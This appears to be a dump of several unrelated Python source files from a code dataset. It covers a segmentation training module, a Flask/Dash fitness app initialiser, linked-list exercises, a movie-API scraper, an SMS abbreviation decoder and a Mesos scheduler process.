[optimizer], [lr_scheduler]\n else:\n return optimizer\n\n def train_dataloader(self):\n return DataLoader(self.train_set, batch_size=self.config.batch_size,\n collate_fn=collate_fn, shuffle=True, pin_memory=True, num_workers=self.config.num_workers, drop_last=True)\n\n def val_dataloader(self):\n return DataLoader(self.test_set, batch_size=self.config.batch_size,\n collate_fn=collate_fn, pin_memory=True, num_workers=self.config.num_workers, drop_last=True)\n\n def test_dataloader(self):\n return DataLoader(self.test_set, batch_size=self.config.batch_size,\n collate_fn=collate_fn, pin_memory=True, num_workers=self.config.num_workers, drop_last=True)\n\n def get_batch(self, batch, mode=\"train\", mask=None):\n if mask:\n imgs, _, _, boxes, targets_image, targets_study, masks = batch\n\n if mode == \"train\":\n img = [img.float() for img in imgs]\n masks = [mask.float() for mask in masks]\n targets_study = torch.stack(targets_study)\n return img, targets_study, masks\n else:\n imgs, _, _, boxes, targets_image, targets_study = batch\n\n if mode == \"train\":\n img = [img.float() for img in imgs]\n targets_study = torch.stack(targets_study)\n return img, targets_study, None\n\n def calc_seg_loss(self, outputs_masks, masks):\n masks_sum = masks.sum(dim=-1).sum(dim=-1).sum(dim=-1)\n\n outputs_masks[masks_sum < 10] *= 0\n masks[masks_sum < 10] *= 0\n\n loss_seg = 0.0\n total = 0\n\n if self.config.loss_pooling:\n outputs_masks = F.max_pool2d(outputs_masks, self.config.loss_pooling)\n masks = F.max_pool2d(masks, self.config.loss_pooling)\n\n if self.config.lambda_bce:\n loss_seg += self.config.lambda_bce * F.binary_cross_entropy_with_logits(outputs_masks, masks)\n total += 1\n if self.config.lambda_lovasz:\n loss_seg += self.config.lambda_lovasz * self.lovasz_loss(outputs_masks, masks)\n total += 1\n if self.config.lambda_dice:\n loss_seg += self.config.lambda_dice * self.dice_loss(outputs_masks, masks)\n total += 1\n if self.config.focal_loss:\n loss_seg += self.config.lambda_focal * self.focal_loss(outputs_masks, masks)\n total += 1\n\n assert total != 0\n\n return loss_seg / total\n","sub_path":"train_code_study_2class/pl_script/unet_smp_mask_cond.py","file_name":"unet_smp_mask_cond.py","file_ext":"py","file_size_in_byte":13125,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"482830088","text":"from flask import Flask\nfrom dash import Dash\n\nfrom .__version__ import __version__\nfrom .utils import get_dash_args_from_flask_config\nfrom sqlalchemy.orm import scoped_session\nfrom .api.database import SessionLocal, engine\nfrom .api.sqlalchemy_declarative import *\nfrom datetime import datetime\n\n\ndef create_flask(config_object=f\"{__package__}.settings\"):\n \"\"\"Create the Flask instance for this application\"\"\"\n server = Flask(__package__)\n\n # load default settings\n server.config.from_object(config_object)\n\n # load additional settings that will override the defaults in settings.py. eg\n # $ export FITLY_SETTINGS=/some/path/prod_settings.py\n server.config.from_envvar(\n \"FITLY_SETTINGS\", silent=True\n )\n\n return server\n\n\ndef create_dash(server):\n Base.metadata.create_all(bind=engine)\n\n \"\"\"Create the Dash instance for this application\"\"\"\n app = Dash(\n name=__package__,\n server=server,\n suppress_callback_exceptions=True,\n **get_dash_args_from_flask_config(server.config),\n )\n\n # Update the Flask config a default \"TITLE\" and then with any new Dash\n # configuration parameters that might have been updated so that we can\n # access Dash config easily from anywhere in the project with Flask's\n # 'current_app'\n server.config.setdefault(\"TITLE\", \"Dash\")\n server.config.update({key.upper(): val for key, val in app.config.items()})\n\n app.title = server.config[\"TITLE\"]\n\n app.session = scoped_session(SessionLocal)\n\n if \"SERVE_LOCALLY\" in server.config:\n app.scripts.config.serve_locally = server.config[\"SERVE_LOCALLY\"]\n app.css.config.serve_locally = server.config[\"SERVE_LOCALLY\"]\n\n return app\n\n\ndef db_startup(app):\n athlete_exists = True if len(app.session.query(athlete).all()) > 0 else False\n # If no athlete created in db, create one\n if not athlete_exists:\n dummy_athlete = athlete(\n min_non_warmup_workout_time=900,\n weekly_tss_goal=150,\n rr_max_goal=8,\n rr_min_goal=5,\n weekly_workout_goal=3,\n weekly_sleep_score_goal=3,\n weekly_readiness_score_goal=3,\n weekly_activity_score_goal=3,\n daily_sleep_hr_target=8,\n ftp_test_notification_week_threshold=6,\n cycle_power_zone_threshold_1=.55,\n cycle_power_zone_threshold_2=.75,\n cycle_power_zone_threshold_3=.9,\n cycle_power_zone_threshold_4=1.05,\n cycle_power_zone_threshold_5=1.2,\n cycle_power_zone_threshold_6=1.5,\n run_power_zone_threshold_1=0.8,\n run_power_zone_threshold_2=0.9,\n run_power_zone_threshold_3=1,\n run_power_zone_threshold_4=1.15,\n hr_zone_threshold_1=.6,\n hr_zone_threshold_2=.7,\n hr_zone_threshold_3=.8,\n hr_zone_threshold_4=.9,\n peloton_auto_bookmark_metric='readiness'\n )\n app.session.add(dummy_athlete)\n app.session.commit()\n\n db_refresh_record = True if len(app.session.query(dbRefreshStatus).all()) > 0 else False\n # Insert initial system load refresh record\n if not db_refresh_record:\n dummy_db_refresh_record = dbRefreshStatus(\n timestamp_utc=datetime.utcnow(),\n refresh_method='system',\n oura_status='System Startup',\n strava_status='System Startup',\n withings_status='System Startup',\n fitbod_status='System Startup')\n app.session.add(dummy_db_refresh_record)\n app.session.commit()\n\n # If fitbod_muslces table not populated create\n fitbod_muscles_table = True if len(app.session.query(fitbod_muscles).all()) > 0 else False\n if not fitbod_muscles_table:\n for exercise, muscle in [('Air Squats', 'Quadriceps'),\n ('Alternating Medicine Ball Push Up', 'Chest'),\n ('Alternating Single Arm Kettlebell Swing', 'Shoulders'),\n ('Arnold Dumbbell Press', 'Shoulders'),\n ('Assisted Chin Up', 'Back'),\n ('Back Extensions', 'Lower Back'),\n ('Back Squat', 'Quadriceps'),\n ('Barbell Bench Press', 'Chest'),\n ('Barbell Curl', 'Biceps'),\n ('Barbell Incline Bench Press', 'Chest'),\n ('Bench Dip', 'Triceps'),\n ('Bent Over Barbell Row', 'Back'),\n ('Biceps Curl To Shoulder Press', 'Biceps'),\n ('Bosu Ball Crunch', 'Abs'),\n ('Bosu Ball Mountain Climber', 'Abs'),\n ('Bosu Ball Push Up', 'Chest'),\n ('Bosu Ball Squat', 'Quadriceps'),\n ('Bulgarian Split Squat', 'Quadriceps'),\n ('Burpee', 'Quadriceps'),\n ('Cable Bicep Curl', 'Biceps'),\n ('Cable Crossover Fly', 'Chest'),\n ('Cable Crunch', 'Abs'),\n ('Cable Face Pull', 'Back'),\n ('Cable Lateral Raise', 'Shoulders'),\n ('Cable Rope Tricep Extension', 'Triceps'),\n ('Cable Row', 'Back'),\n ('Cable Russian Twists', 'Abs'),\n ('Cable Shoulder External Rotation', 'Shoulders'),\n ('Cable Shoulder External Rotation at 90', 'Shoulders'),\n ('Cable Tricep Pushdown', 'Triceps'),\n ('Cable Upright Row', 'Shoulders'),\n ('Cable Wood Chop', 'Abs'),\n ('Chin Up', 'Back'),\n ('Clean Deadlift', 'Hamstrings'),\n ('Close-Grip Bench Press', 'Triceps'),\n ('Concentration Curl', 'Biceps'),\n ('Crunches', 'Abs'),\n ('Curtsy Lunge', 'Hamstrings'),\n ('Dead Bug', 'Abs'),\n ('Deadlift', 'Lower Back'),\n ('Decline Crunch', 'Abs'),\n ('Decline Push Up', 'Chest'),\n ('Diamond Push Up', 'Chest'),\n ('Dip', 'Triceps'),\n ('Dumbbell Bench Press', 'Chest'),\n ('Dumbbell Bent Over Row', 'Back'),\n ('Dumbbell Bicep Curl', 'Biceps'),\n ('Dumbbell Clean', 'Hamstrings'),\n ('Dumbbell Decline Bench Press', 'Chest'),\n ('Dumbbell Decline Fly', 'Chest'),\n ('Dumbbell Floor Press', 'Chest'),\n ('Dumbbell Fly', 'Chest'),\n ('Dumbbell Front Raise', 'Shoulders'),\n ('Dumbbell Incline Bench Press', 'Chest'),\n ('Dumbbell Incline Fly', 'Chest'),\n ('Dumbbell Kickbacks', 'Triceps'),\n ('Dumbbell Lunge', 'Quadriceps'),\n ('Dumbbell No Money Curls', 'Biceps'),\n ('Dumbbell Pullover', 'Back'),\n ('Dumbbell Rear Delt Raise', 'Shoulders'),\n ('Dumbbell Romanian Deadlift', 'Lower Back'),\n ('Dumbbell Row', 'Back'),\n ('Dumbbell Shoulder Press', 'Shoulders'),\n ('Dumbbell Shoulder Raise', 'Shoulders'),\n ('Dumbbell Skullcrusher', 'Triceps'),\n ('Dumbbell Snatch', 'Hamstrings'),\n ('Dumbbell Squat', 'Quadriceps'),\n ('Dumbbell Squat To Shoulder Press', 'Quadriceps'),\n ('Dumbbell Step Up', 'Quadriceps'),\n ('Dumbbell Sumo Squat', 'Quadriceps'),\n ('Dumbbell Tricep Extension', 'Triceps'),\n ('Dumbbell Upright Row', 'Shoulders'),\n ('EZ-Bar Curl', 'Biceps'),\n ('Flutter Kicks', 'Abs'),\n ('Front Plate Raise', 'Shoulders'),\n ('Front Squat', 'Quadriceps'),\n ('Good Morning', 'Hamstrings'),\n ('Hack Squat', 'Quadriceps'),\n ('Hammer Curls', 'Biceps'),\n ('Hammerstrength Chest Press', 'Chest'),\n ('Hammerstrength Incline Chest Press', 'Chest'),\n ('Heel Press', ''),\n ('Incline Barbell Skull Crusher', 'Triceps'),\n ('Incline Dumbbell Curl', 'Biceps'),\n ('Incline Dumbbell Row', 'Back'),\n ('Incline Hammer Curl', 'Biceps'),\n ('Incline Push Up', 'Chest'),\n ('Incline Svend Press', 'Chest'),\n ('Iron Cross', 'Shoulders'),\n ('Jackknife Sit-Up', 'Abs'),\n ('Jump Squat', 'Quadriceps'),\n ('Kettlebell Front Squat', 'Quadriceps'),\n ('Kettlebell Sumo Squat', 'Quadriceps'),\n ('Kettlebell Swing', 'Hamstrings'),\n ('Kettlebell Upright Row', 'Shoulders'),\n ('Landmine Row', 'Back'),\n ('Landmine Squat to Press', 'Quadriceps'),\n ('Lat Pulldown', 'Back'),\n ('Lateral Cable Tricep Extension', 'Triceps'),\n ('Lateral Step Up', 'Hamstrings'),\n ('Lateral Step Up with Knee Drive', 'Hamstrings'),\n ('Leg Extension', 'Quadriceps'),\n ('Leg Press', 'Quadriceps'),\n ('Leg Pull-In', 'Abs'),\n ('Leg Raise', 'Abs'),\n ('Low Cable Chest Fly', 'Chest'),\n ('Lunge', 'Hamstrings'),\n ('Lunge Jump', 'Hamstrings'),\n ('Lunge with Ankle Grab', 'Hamstrings'),\n ('Machine Bench Press', 'Chest'),\n ('Machine Fly', 'Chest'),\n ('Machine Leg Press', 'Quadriceps'),\n ('Machine Preacher Curl', 'Biceps'),\n ('Machine Rear Delt Fly', 'Shoulders'),\n ('Machine Tricep Extension', 'Triceps'),\n ('Medicine Ball Push Up', 'Chest'),\n ('Medicine Ball Slam', 'Triceps'),\n ('Mixed Grip Pull Up', 'Back'),\n ('Mountain Climber', 'Abs'),\n ('Oblique Crunch', 'Abs'),\n ('Palms-Down Dumbbell Wrist Curl', 'Forearms'),\n ('Palms-Up Dumbbell Wrist Curl', 'Forearms'),\n ('Pike Push Up', 'Chest'),\n ('Plank', 'Abs'),\n ('Preacher Curl', 'Biceps'),\n ('Pull Up', 'Back'),\n ('Pulse Lunge', 'Hamstrings'),\n ('Push Press', 'Shoulders'),\n ('Push Up', 'Chest'),\n ('Push Up on Knees', 'Chest'),\n ('Rack Pulls', 'Lower Back'),\n ('Renegade Row', 'Back'),\n ('Reverse Barbell Curl', 'Biceps'),\n ('Reverse Crunch', 'Abs'),\n ('Reverse Grip Pull Down', 'Back'),\n ('Reverse Leg Crossover', 'Hamstrings'),\n ('Reverse Lunge', 'Hamstrings'),\n ('Romanian Deadlift', 'Hamstrings'),\n ('Rotation Push Up', 'Chest'),\n ('Russian Twist', 'Abs'),\n ('Scissor Crossover Kick', 'Abs'),\n ('Scissor Kick', 'Abs'),\n ('Seated Dumbbell Curl', 'Biceps'),\n ('Seated Dumbbell Rear Delt Raise', 'Shoulders'),\n ('Seated Leg Curl', 'Hamstrings'),\n ('Seated Tricep Press', 'Triceps'),\n ('Shotgun Row', 'Back'),\n ('Side Bridge', 'Abs'),\n ('Side Laterals to Front Raise', 'Shoulders'),\n ('Side Lunge', 'Quadriceps'),\n ('Single Arm Cable Bicep Curl', 'Biceps'),\n ('Single Arm Dumbbell Bench Press', 'Chest'),\n ('Single Arm Dumbbell Tricep Extension', 'Triceps'),\n ('Single Arm Landmine Press', 'Triceps'),\n ('Single Arm Landmine Row', 'Back'),\n ('Single Arm Lat Pulldown', 'Back'),\n ('Single Arm Overhead Press', 'Shoulders'),\n ('Single Arm Preacher Curl', 'Biceps'),\n ('Single Leg Kettlebell Deadlift', 'Lower Back'),\n ('Single Leg Romanian Deadlift', 'Lower Back'),\n ('Sit Up', 'Abs'),\n ('Skullcrusher', 'Triceps'),\n ('Smith Machine Bent Over Row', 'Back'),\n ('Smith Machine Squat', 'Quadriceps'),\n ('Smith Machine Stiff-Legged Deadlift', 'Lower Back'),\n ('Smith Machine Upright Row', 'Back'),\n ('Squat with Rotation', 'Quadriceps'),\n ('Standing Arnold Press', 'Shoulders'),\n ('Stiff-Legged Barbell Good Morning', 'Hamstrings'),\n ('Straight-Arm Pulldown', 'Back'),\n ('Superman', 'Lower Back'),\n ('Tate Press', 'Triceps'),\n ('T-Bar Row', 'Back'),\n ('Toe Touchers', 'Abs'),\n ('Tricep Overhead Extension with Rope', 'Triceps'),\n ('Tuck Jump', 'Abs'),\n ('Underhand Rear Delt Raise', 'Shoulders'),\n ('Upright Row', 'Back'),\n ('V-Bar Pulldown', 'Back'),\n ('Walking Lunge', 'Quadriceps'),\n ('Wall Sit', 'Abs'),\n ('Weighted Ball Hyperextension', 'Lower Back'),\n ('Weighted Wall Sit', 'Abs'),\n ('Wide Grip Lat Pulldown', 'Back'),\n ('Zottman Curl', 'Biceps'),\n ('Zottman Preacher Curl', 'Biceps')]:\n app.session.add(fitbod_muscles(exercise=exercise, muscle=muscle))\n app.session.commit()\n app.session.remove()\n","sub_path":"src/fitly/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":16507,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"457980819","text":"class LinkedList:\n class Node:\n next = None\n item = None\n def __init__(self, d):\n self.item = d\n \n root = None\n \n def __init__(self, *items):\n self.addAll(*items)\n \n def add(self, item):\n #No elements in LinkedList\n if self.root is None:\n self.root = LinkedList.Node(item)\n return\n \n next = self.root\n while next.next is not None:\n next = next.next\n \n next.next = LinkedList.Node(item)\n \n def addAll(self, *items):\n for i in range(len(items)):\n self.add(items[i])\n \n def remove(self, item):\n assert(self.root is not None)\n curr = self.root\n prev = None\n while curr.item is not item:\n prev = curr\n curr = prev.next\n \n #First node\n if prev is None:\n self.root = self.root.next\n else: \n prev.next = curr.next\n \n def traverse(self):\n if self.root is None:\n return []\n curr = self.root\n traversal = [curr.item]\n while curr.next is not None:\n curr = curr.next\n traversal.append(curr.item) \n #print(traversal)\n return traversal\n \n def reverse(self):\n if self.root is None:\n return\n curr = self.root\n self.root = None\n while curr is not None:\n #Store next node\n temp = curr.next\n #Point current node to previous node (Reverse)\n curr.next = self.root\n #Store curr node as previous node(head of list)\n self.root = curr\n #Go to next node\n curr = temp\n \n def nodeAt(self, i):\n if i < 1 or self.root is None:\n return None\n \n nd = self.root\n while nd.next is not None and i > 1:\n nd = nd.next\n i = i-1\n \n if i > 1:\n return None\n return nd\n \ndef deleteDuplicateSet(ll):\n if ll.root is None:\n return\n data_set = {}\n curr = ll.root\n prev = None\n while curr is not None:\n try:\n data_set[curr.item]\n prev.next = curr.next\n except KeyError:\n data_set[curr.item] = ''\n prev = curr\n finally:\n curr = curr.next\n \ndef checkPalindrome(ll):\n if ll.root is None:\n return False\n \n slow = ll.root\n fast = ll.root\n stack = []\n while fast is not None and fast.next is not None:\n stack.append(slow.item)\n fast = fast.next.next\n slow = slow.next\n #print(stack)\n \n #odd list\n if fast is not None:\n slow = slow.next\n \n while slow is not None:\n if slow.item == stack.pop():\n slow = slow.next\n else:\n return False\n return True\n \ndef intersection(ll1, ll2):\n assert(ll1.root is not None and ll2.root is not None)\n curr1 = ll1.root\n curr2 = ll2.root\n l1 = 1\n l2 = 1\n while curr1.next is not None:\n l1 += 1\n curr1 = curr1.next\n \n while curr2.next is not None:\n l2 += 1\n curr2 = curr2.next\n\n #No intersection if last node is not same\n if not curr1 == curr2:\n return 0\n \n if l1 > l2:\n k = l1 - l2\n longer = ll1.root\n shorter = ll2.root\n else:\n k = l2 - l1\n longer = ll2.root\n shorter = ll1.root\n \n while k > 0:\n longer = longer.next\n k = k-1\n \n i=0\n while longer != shorter and shorter is not None:\n longer = longer.next\n shorter = shorter.next\n i += 1\n \n return i+1\n \n \ndef joinLinkedList(ll1, ll2, k):\n #Joins end of ll1 to ll2 at k position\n joined = LinkedList(*ll1.traverse())\n end1 = joined.root\n while end1.next is not None:\n end1 = end1.next\n \n i = 1\n i_pt = ll2.root\n while i != k:\n i += 1\n i_pt = i_pt.next\n \n end1.next = i_pt\n return joined\n \ndef detectLoop(ll):\n #Fast and slow pointer can detect loop\n fast = ll.root\n slow = ll.root\n while fast is not None and fast.next is not None:\n fast = fast.next.next\n slow = slow.next \n if fast == slow:\n break\n \n if fast is None or fast.next is None:\n return None\n \n slow = ll.root\n while fast is not None:\n if fast == slow:\n return fast\n fast = fast.next\n slow = slow.next \n \n return None\n \n \ndef testLinkedList():\n ll = LinkedList(1) \n assert(ll.traverse()==[1])\n ll.remove(1)\n assert(ll.traverse()==[])\n try:\n ll.remove(1)\n raise Exception(\"Error in remove\")\n except AssertionError:\n pass\n ll.add(2)\n ll.add(3)\n assert(ll.traverse() == [2,3])\n ll.remove(2)\n assert(ll.traverse()==[3])\n ll.add(4)\n ll.add(1)\n assert(ll.traverse()==[3,4,1])\n ll.remove(1)\n ll.remove(4)\n assert(ll.traverse()==[3])\n ll.addAll(1,2,3,4,5,6,4,3,2,5,6)\n assert(ll.traverse()==[3,1,2,3,4,5,6,4,3,2,5,6])\n ll_list = ll.traverse()\n ll_list.reverse()\n ll.reverse()\n assert(ll.traverse()==ll_list)\n ll.reverse()\n ll_list.reverse()\n assert(ll.traverse()==ll_list)\n deleteDuplicateSet(ll)\n assert(ll.traverse()==[3,1,2,4,5,6])\n ll2 = LinkedList(1,2,3,2,1)\n assert(checkPalindrome(ll2)==True)\n ll2 = LinkedList(1,2,2,1)\n assert(checkPalindrome(ll2)==True)\n ll2 = LinkedList(1,2,3,3,2,1)\n assert(checkPalindrome(ll2)==True)\n ll2 = LinkedList(1,2,3,3,4,1)\n assert(checkPalindrome(ll2)==False)\n ll2 = LinkedList(1,2,3,2,3)\n assert(checkPalindrome(ll2)==False)\n ll1 = LinkedList(1,2,3,4,5)\n ll2 = LinkedList(21,22,23,24,25)\n assert(intersection(ll1, ll2) == 0)\n joined = joinLinkedList(ll1, ll2, 4)\n assert(joined.traverse() == [1,2,3,4,5,24,25])\n assert(intersection(joined, ll2) == 4)\n joined = joinLinkedList(ll2, ll1, 5)\n assert(joined.traverse() == [21,22,23,24,25,5])\n assert(intersection(joined, ll2) == 0)\n assert(intersection(joined, ll1) == 5)\n \n assert(detectLoop(ll1) == None)\n assert(detectLoop(LinkedList()) == None)\n assert(detectLoop(LinkedList(1)) == None)\n assert(detectLoop(LinkedList(1, 2)) == None)\n lll = LinkedList(*ll1.traverse())\n #1->2->3->4->5->1\n lll.nodeAt(5).next = lll.root\n assert(detectLoop(lll).item == 1)\n \n #1->2->3->4->5->2\n lll.nodeAt(5).next = lll.nodeAt(2)\n assert(detectLoop(lll).item == 2)\n \n #1->2->3->4->5->3\n lll.nodeAt(5).next = lll.nodeAt(3)\n assert(detectLoop(lll).item == 3)\n \n #1->2->3->4->5->4\n lll.nodeAt(5).next = lll.nodeAt(4)\n assert(detectLoop(lll).item == 4)\n \n #1->2->3->4->5->5\n lll.nodeAt(5).next = lll.nodeAt(5)\n assert(detectLoop(lll).item == 5)\n \ntestLinkedList() ","sub_path":"2linkedlist.py","file_name":"2linkedlist.py","file_ext":"py","file_size_in_byte":6996,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"51268017","text":"####content랑 country 테이블\nimport requests\nimport json\nimport datetime\nimport pymysql\nimport time\n\n\n#conn = pymysql.connect(host='18.188.140.138', user='user01', password='1111', db='movies_db', charset='utf8')\ncursor = conn.cursor()\n\nsql = \"SELECT content_id, title FROM contents\"\n\ncursor.execute(sql)\nmc = cursor.fetchall() #content테이블 content_id, title 불러옴\n\nsql = \"SELECT * FROM production_countrys\"\n\ncursor.execute(sql)\nc_table = cursor.fetchall() #국가 테이블 불러옴\n\n\nfor i in range(len(mc)):\n movieCd = str(mc[i][0]) #검색을 위해 문자열로 바꿈\n\n #무비코드로 영화 상세정보 크롤링(영진위API)\n url = 'http://www.kobis.or.kr/kobisopenapi/webservice/rest/movie/searchMovieInfo.json?key='+mykey+'&movieCd='+movieCd\n\n #time.sleep(3) #3초\n req = requests.get(url)\n text = req.text\n\n d = json.loads(text)\n\n b=d['movieInfoResult']['movieInfo'] #b = 영화세부정보\n #print(b)\n print(b['movieNm'])\n \n #국가정보 (문자열 하나로 만들지 말고 하나하나 따로 로우로 만들어서 content_country에 저장해야 함)\n for j in b['nations']: #j = 영화 국가정보\n nation = j['nationNm']\n check = 0\n for j in range(len(c_table)): #국가이름을 코드로 치환\n if nation == c_table[j][1]:\n nation_code = c_table[j][0]\n check = 1\n break\n if check == 0: #국가 테이블에 없는 국가는 기타(ee)로 저장됨\n nation_code = 'ee'\n #print('전:'+nation+' 후:'+nation_code)\n l = [mc[i][0], nation_code]\n sql = \"INSERT INTO content_country (content_pid, nation_code) VALUES (%s, %s)\"\n try:\n cursor.execute(sql,l)\n except:\n print('오류생김')\n pass\n \nconn.commit()\nconn.close()","sub_path":"code/movie data/content_country.py","file_name":"content_country.py","file_ext":"py","file_size_in_byte":1866,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"482119454","text":"#Sample code for SMS translator\r\nimport re, string\r\ndef chatDecoder():\r\n abr=['b1','141','AA','AAK','AAF','A3','LOL','IAAG','FR']\r\n longAbr=['be one','one for all and all for one','Ask about','Alive and kicking/Asleep at keyboard','As a friend/As a matter of fact','Anytime, Anywhere, Anyplace',\\\r\n 'laugh out loud','i am a Genuis','for real']\r\n message=input(\"What message do you want decoded? \\n\")\r\n translator = str.maketrans({key: None for key in string.punctuation})\r\n message=message.translate(translator)\r\n messageToList=message.split() # changes a sentence into loopable elements.\r\n \r\n for i in messageToList:\r\n modifiedMessage=\"\"\r\n for j in abr:\r\n #if i==j:\r\n if re.fullmatch(i, j, re.IGNORECASE):\r\n i=longAbr[abr.index(j)] \r\n # here italicize i\r\n else:\r\n i=i\r\n modifiedMessage+=i \r\n modifiedMessage=modifiedMessage.lower()\r\n print(modifiedMessage, end=\" \") # The end=\" \", prints the output horizontally\r\n print(\".\")\r\n return\r\n\r\nchatDecoder()\r\n","sub_path":"sms.py","file_name":"sms.py","file_ext":"py","file_size_in_byte":1108,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"379191506","text":"from collections import defaultdict\nfrom getpass import getuser\nimport functools\nimport logging\nimport threading\nimport socket\nimport sys\n\nfrom .detector import StandaloneMasterDetector\nfrom .util import camel_call, timed, unique_suffix\nfrom .vendor import mesos\n\nfrom compactor.context import Context\nfrom compactor.pid import PID\nfrom compactor.process import ProtobufProcess\nfrom mesos.interface import SchedulerDriver\n\nlog = logging.getLogger(__name__)\n\n\nclass SchedulerProcess(ProtobufProcess):\n def __init__(self, driver, scheduler, framework, credential=None, detector=None):\n self.driver = driver\n self.scheduler = scheduler\n self.framework = framework\n self.master = None\n\n # events\n self.connected = threading.Event()\n self.aborted = threading.Event()\n self.failover = threading.Event()\n\n # credentials\n self.credential = credential\n self.authenticating = threading.Event()\n self.authenticated = threading.Event()\n\n # master detection\n self.detector = detector\n\n # saved state\n self.saved_offers = defaultdict(dict)\n self.saved_slaves = {}\n\n super(SchedulerProcess, self).__init__(unique_suffix('scheduler'))\n\n def initialize(self):\n super(SchedulerProcess, self).initialize()\n self.detector.detect(previous=self.master).add_done_callback(self.detected)\n\n def ignore_if_aborted(method):\n @functools.wraps(method)\n def _wrapper(self, from_pid, *args, **kwargs):\n if self.aborted.is_set():\n log.info('Ignoring message from %s because the scheduler driver is aborted.' % from_pid)\n return\n return method(self, from_pid, *args, **kwargs)\n return _wrapper\n\n def ignore_if_disconnected(method):\n @functools.wraps(method)\n def _wrapper(self, *args, **kwargs):\n if not self.connected.is_set():\n log.info('Ignoring message from because the scheduler driver is disconnected.')\n return\n return method(self, *args, **kwargs)\n return _wrapper\n\n def valid_origin(self, from_pid):\n if self.master != from_pid:\n log.warning('Ignoring message from non-leading master %s' % from_pid)\n return False\n return True\n\n @ignore_if_aborted\n def detected(self, master_future):\n try:\n master_uri = master_future.result()\n except Exception as e:\n log.fatal('Failed to detect master: %s' % e)\n # TODO(wickman) Are we on MainThread? If not, this might not actually terminate anything\n # but this thread.\n sys.exit(1)\n\n if self.connected.is_set():\n self.connected.clear()\n with timed(log.debug, 'scheduler::disconnected'):\n camel_call(self.scheduler, 'disconnected', self.driver)\n\n # TODO(wickman) Implement authentication.\n if master_uri:\n log.info('New master detected: %s' % master_uri)\n self.master = PID.from_string(\"master@%s\" % master_uri)\n self.link(self.master)\n else:\n self.master = None\n\n self.__maybe_register()\n\n # TODO(wickman) Detectors should likely operate on PIDs and not URIs.\n self.detector.detect(previous=master_uri).add_done_callback(self.detected)\n\n # TODO(wickman) Implement reliable registration -- i.e. __maybe_register() should operate\n # in a loop until self.connected.is_set().\n def __maybe_register(self):\n if self.connected.is_set() or self.master is None:\n return\n\n # We have never registered before\n if not self.framework.id.value:\n message = mesos.internal.RegisterFrameworkMessage(framework=self.framework)\n log.info('Registering framework: %s' % message)\n else:\n message = mesos.internal.ReregisterFrameworkMessage(\n framework=self.framework, failover=self.failover.is_set())\n log.info('Reregistering framework: %s' % message)\n\n self.send(self.master, message)\n\n @ProtobufProcess.install(mesos.internal.FrameworkRegisteredMessage)\n @ignore_if_aborted\n def registered(self, from_pid, message):\n if self.connected.is_set():\n log.info('Ignoring registered message as we are already connected.')\n return\n if not self.valid_origin(from_pid):\n return\n self.framework.id.value = message.framework_id.value\n self.connected.set()\n self.failover.clear()\n\n with timed(log.debug, 'scheduler::registered'):\n camel_call(self.scheduler, 'registered',\n self.driver, message.framework_id, message.master_info)\n\n @ProtobufProcess.install(mesos.internal.FrameworkReregisteredMessage)\n @ignore_if_aborted\n def reregistered(self, from_pid, message):\n if self.connected.is_set():\n log.info('Ignoring registered message as we are already connected.')\n return\n if not self.valid_origin(from_pid):\n return\n assert self.framework.id == message.framework_id\n self.connected.set()\n self.failover.clear()\n\n with timed(log.debug, 'scheduler::reregistered'):\n camel_call(self.scheduler, 'reregistered', self.driver, message.master_info)\n\n @ProtobufProcess.install(mesos.internal.ResourceOffersMessage)\n @ignore_if_disconnected\n @ignore_if_aborted\n def resource_offers(self, from_pid, message):\n assert self.master is not None\n if not self.valid_origin(from_pid):\n return\n for offer, pid in zip(message.offers, message.pids):\n offer_id = offer.id.value\n slave_id = offer.slave_id.value\n self.saved_offers[offer_id][slave_id] = PID.from_string(pid)\n with timed(log.debug, 'scheduler::resource_offers'):\n camel_call(self.scheduler, 'resource_offers', self.driver, message.offers)\n\n @ProtobufProcess.install(mesos.internal.RescindResourceOfferMessage)\n @ignore_if_disconnected\n @ignore_if_aborted\n def rescind_offer(self, from_pid, message):\n assert self.master is not None\n if not self.valid_origin(from_pid):\n return\n log.info('Rescinding offer %s' % message.offer_id.value)\n if not self.saved_offers.pop(message.offer_id.value, None):\n log.warning('Offer %s not found.' % message.offer_id.value)\n with timed(log.debug, 'scheduler::offer_rescinded'):\n camel_call(self.scheduler, 'offer_rescinded', self.driver, message.offer_id)\n\n @ProtobufProcess.install(mesos.internal.StatusUpdateMessage)\n @ignore_if_disconnected\n @ignore_if_aborted\n def status_update(self, from_pid, message):\n if not self.valid_origin(from_pid):\n return\n if message.pid:\n sender_pid = PID.from_string(message.pid)\n self.status_update_acknowledgement(message.update, sender_pid)\n with timed(log.debug, 'scheduler::status_update'):\n camel_call(self.scheduler, 'status_update', self.driver, message.update.status)\n\n @ignore_if_aborted\n def status_update_acknowledgement(self, update, pid):\n message = mesos.internal.StatusUpdateAcknowledgementMessage(\n framework_id=self.framework.id,\n slave_id=update.slave_id,\n task_id=update.status.task_id,\n uuid=update.uuid,\n )\n self.send(pid, message)\n\n @ProtobufProcess.install(mesos.internal.LostSlaveMessage)\n @ignore_if_disconnected\n @ignore_if_aborted\n def lost_slave(self, from_pid, message):\n assert self.master is not None\n if not self.valid_origin(from_pid):\n return\n self.slave_pids.pop(message.slave_id)\n with timed(log.debug, 'scheduler::slave_lost'):\n camel_call(self.scheduler, 'slave_lost', self.driver, message.slave_id)\n\n @ProtobufProcess.install(mesos.internal.ExecutorToFrameworkMessage)\n @ignore_if_aborted\n def framework_message(self, from_pid, message):\n with timed(log.debug, 'scheduler::framework_message'):\n camel_call(self.scheduler, 'framework_message',\n self.driver,\n message.executor_id,\n message.slave_id,\n message.data\n )\n\n @ProtobufProcess.install(mesos.internal.FrameworkErrorMessage)\n @ignore_if_aborted\n def error(self, from_pid, message):\n with timed(log.debug, 'scheduler::error'):\n camel_call(self.scheduler, 'error', self.driver, message.message)\n\n @ignore_if_aborted\n def stop(self, failover=False):\n if not failover:\n self.connected.clear()\n self.failover.set()\n self.send(self.master, mesos.internal.UnregisterFrameworkMessage(\n framework_id=self.framework.id\n ))\n\n @ignore_if_aborted\n def abort(self):\n self.connected.clear()\n self.aborted.set()\n\n 